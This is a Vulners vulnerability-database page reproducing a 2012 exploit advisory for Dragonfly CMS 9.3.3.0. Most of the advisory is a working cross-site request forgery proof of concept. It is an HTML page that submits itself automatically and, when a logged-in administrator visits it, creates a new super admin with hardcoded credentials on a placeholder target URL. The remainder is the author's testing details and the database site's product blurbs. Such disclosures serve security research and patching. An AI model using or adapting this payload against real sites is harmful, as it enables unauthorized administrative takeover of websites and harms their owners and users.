Vulners
Lucene search
Dragonfly CMS 9.3.3.0 Cross Site Request Forgery
`=================================================================================================
Vulnerable Software: Dragonfly CMS v9.3.3.0
Downloaded and tested from: http://dragonflycms.org/Downloads/get=28/
Fileinfo:dragonflycms.org Dragonfly9.3.3.0.zip 2.25 MB 70aea682301253637844d7caa10c3ed0
=================================================================================================
Vuln Desc:
Dragonfly CMS v9.3.3.0 suffers from CROSS SITE REQUEST FORGERY vulnerability.
Will Pwn: If currently logged administrator visits malicious LINK which contains POC code(see below)
New Super Admin will be created on remote site with this credentials:
Username: MySecRet1
Email: [email protected]
Password: MySecRet1
@Print Screen on Success Pwn: http://s019.radikal.ru/i635/1203/f1/03e535781d5f.png
=================================================================================================
/*
Tested on: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
Successfully exploitates.
*/
===================Dragonfly CMS v9.3.3.0 CSRF ADD SUPER ADMIN Proof Of Concept Exploit=====================
<html>
<head>
<title>Dragonfly CMS v9.3.3.0 CSRF ADD SUPER ADMIN Proof Of Concept Exploit</title>
</head>
<body onload="javascript:document.forms[0].submit()">
<form method="post" autocomplete="off" action="http://CHANGE_TO_RTARGET/admin.php?op=admins&mode=add" enctype="multipart/form-data" accept-charset="utf-8">
<!-- User name -->
<input type="hidden" name="add_aid" id="add_aid" size="31" maxlength="30" value="MySecRet1"/>
<!-- Email Address -->
<input type="hidden" name="add_email" id="add_email" size="31" maxlength="60" value="[email protected]" />
<!-- checked (for create super admin)-->
<input type="hidden" name="radminsuper" id="radminsuper" value="1" checked="checked" />
<!-- Password -->
<input type="hidden" name="add_pwd" id="add_pwd" size="20" maxlength="40" value="MySecRet1" />
</form>
</body>
<!--
On successfully Pwn will be created:
Username: MySecRet1
Email: [email protected]
Password: MySecRet1
CTRL+F http://CHANGE_TO_RTARGET change to remote target.
-->
</html>
===================================EOF==========================================================
/AkaStep ^_^
GreetZ to all: packetstormsecurity.* ,securityfocus.com,security.nnov.ru
+--------------+
| Live |
+--------------+
| 1331522784 |
+--------------+
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Mar 2012 00:00Current
0.8Low risk
Vulners AI Score0.8